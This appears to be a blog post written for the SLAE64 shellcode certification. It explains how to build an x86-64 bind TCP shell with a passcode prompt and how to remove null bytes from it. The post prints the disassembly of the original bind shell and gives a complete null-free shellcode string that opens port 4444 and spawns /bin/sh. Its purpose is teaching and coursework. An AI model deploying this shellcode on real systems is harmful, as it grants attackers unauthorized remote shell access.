SLAE64 - Bind TCP shellcode
The first assignment of the SLAE64 exam states:
- Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a “passcode”
- If passcode is correct then execute a shell
- Remove
0x00
from the Bind TCP shellcode discussed in the course
Shell Bind TCP shellcode⌗
The first assignment is to create a shell bind TCP shellcode which requires a passcode to spawn a shell. What happens when a wrong password is entered isn’t defined so I’ll just exit with a non-zero return code.
It follows this basic pattern to spawn a shell:
- Allocate a file descriptor through
socket(2)
- Set up the structure defining the address family, address and port to listen to
- Bind the socket with the above parameters
- Listen on the socket for incoming connections
- Upon accepting a connection perform the needed steps with to duplicate file descriptors for input/output
- Print a password prompt and require the correct password to be entered
- If the password was correct a shell is spawn; otherwise it exits
If this was regular assembly and not shellcode where size is a constraint it would be a good habit to check the return code of the syscalls. Most of them return a negative value upon failure, so we can test for a value less than 0
(set in R13 in the example below) and jump to the out
label which will call exit
with a non-zero return code to indicate a failure. For example:
[...]
syscall
xor r13, r13
cmp rax, r13
jl out
out:
mov rax, 60
mov rdi, 1
syscall
However this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise ignore any errors and hope the system doesn’t throw us any errors.
The passcode handling relies on a simple cmp
instruction and whether it sets the zero flag
or not. This works as cmp
subtracts the operands and if they were equal the end result is zero, thus ZF
ends up getting set. This means the data we read is equal to the string we stored previously in RBX.
For me the difficulty in this assignment was to correctly lay out the required structs on the stack without introducing any NULL bytes. The prime example of this is setting up struct sockaddr
for the bind(2)
syscall.
First off, we need to construct the struct (pun intended) in reverse order as we’re dealing with the stack. So start by pushing 8 bytes of 0 for sin_zero
:
xor rax, rax
push rax
Now here comes the key, push another 8 bytes of zero. This ensures the stack space we need is essentially zeroed out for future additions to the stack to rely upon:
push rax ; Another 8 bytes worth of zero.
; Half of it is for sin_addr.s_addr.
mov word [rsp+2], 0x5c11 ; Push our port number (4444) onto the stack
mov byte [rsp], 0x2 ; AF_INET = 2
In the end I decided to add an enter password:
prompt as well. Since that strings exceeds 8 bytes it had to be pushed onto the stack using two mov
/push
operations.
The total size of this shellcode is 251 bytes.
Removing 0x00 from the discussed shellcode⌗
The original shellcode contains a fair number of NULLs according to objdump:
$ objdump -D -M intel BindShell.o
BindShell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: b8 29 00 00 00 mov eax,0x29
5: bf 02 00 00 00 mov edi,0x2
a: be 01 00 00 00 mov esi,0x1
f: ba 00 00 00 00 mov edx,0x0
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: 66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
2f: 48 83 ec 08 sub rsp,0x8
33: b8 31 00 00 00 mov eax,0x31
38: 48 89 e6 mov rsi,rsp
3b: ba 10 00 00 00 mov edx,0x10
40: 0f 05 syscall
42: b8 32 00 00 00 mov eax,0x32
47: be 02 00 00 00 mov esi,0x2
4c: 0f 05 syscall
4e: b8 2b 00 00 00 mov eax,0x2b
53: 48 83 ec 10 sub rsp,0x10
57: 48 89 e6 mov rsi,rsp
5a: c6 44 24 ff 10 mov BYTE PTR [rsp-0x1],0x10
5f: 48 83 ec 01 sub rsp,0x1
63: 48 89 e2 mov rdx,rsp
66: 0f 05 syscall
68: 49 89 c1 mov r9,rax
6b: b8 03 00 00 00 mov eax,0x3
70: 0f 05 syscall
72: 4c 89 cf mov rdi,r9
75: b8 21 00 00 00 mov eax,0x21
7a: be 00 00 00 00 mov esi,0x0
7f: 0f 05 syscall
81: b8 21 00 00 00 mov eax,0x21
86: be 01 00 00 00 mov esi,0x1
8b: 0f 05 syscall
8d: b8 21 00 00 00 mov eax,0x21
92: be 02 00 00 00 mov esi,0x2
97: 0f 05 syscall
99: 48 31 c0 xor rax,rax
9c: 50 push rax
9d: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
a4: 2f 73 68
a7: 53 push rbx
a8: 48 89 e7 mov rdi,rsp
ab: 50 push rax
ac: 48 89 e2 mov rdx,rsp
af: 57 push rdi
b0: 48 89 e6 mov rsi,rsp
b3: 48 83 c0 3b add rax,0x3b
b7: 0f 05 syscall
There are a few common patterns we can use to get rid of the NULLs. For example:
mov eax, 41
can also be expressed as:
xor rax, rax ; clear the rax register (effectively zeroing it)
add rax, 41 ; add 41 to 0
Instead of using the add
instruction after clearing the register we could increment the register value if we need something small like 1 or 2.
Another methods is to subtract the register from itself:
sub rax, rax
add rax, 41
If we also optimize it for size we could take it one step further by using al
which are the lower 8 bits of the 64 bit rax
register:
04 29 add al,0x29
compared to:
48 83 c0 29 add rax,0x29
Additionally, using the stack to push values to before popping them into the destination register is another method to get rid of NULLs and oftentimes decrease codesize too.
The end result for my clean BindShell_no_null.nasm
is:
\x48\x31\xc0\x40\xb7\x02\x40\x88\xc6\x40\xfe\xc6\x88\xc2\x48\x83\xc0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x40\x88\xc6\xb0\x32\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x29\xc0\xfe\xc0\xfe\xc0\xfe\xc0\x0f\x05\x4c\x89\xcf\x48\x31\xc9\x88\xc8\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05
It is slightly larger than the original but I have used a variety of ways to zero out and increment registers without always having used a method that would generate the smallest amount of code per se.
Wrapping up⌗
I have uploaded my code to jasperla/slae64 on GitHub:
I have also uploaded a helper script I wrote to the repository which helped me in testing and validating the code throughout the course: compile.py (requires Python 3.6).
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614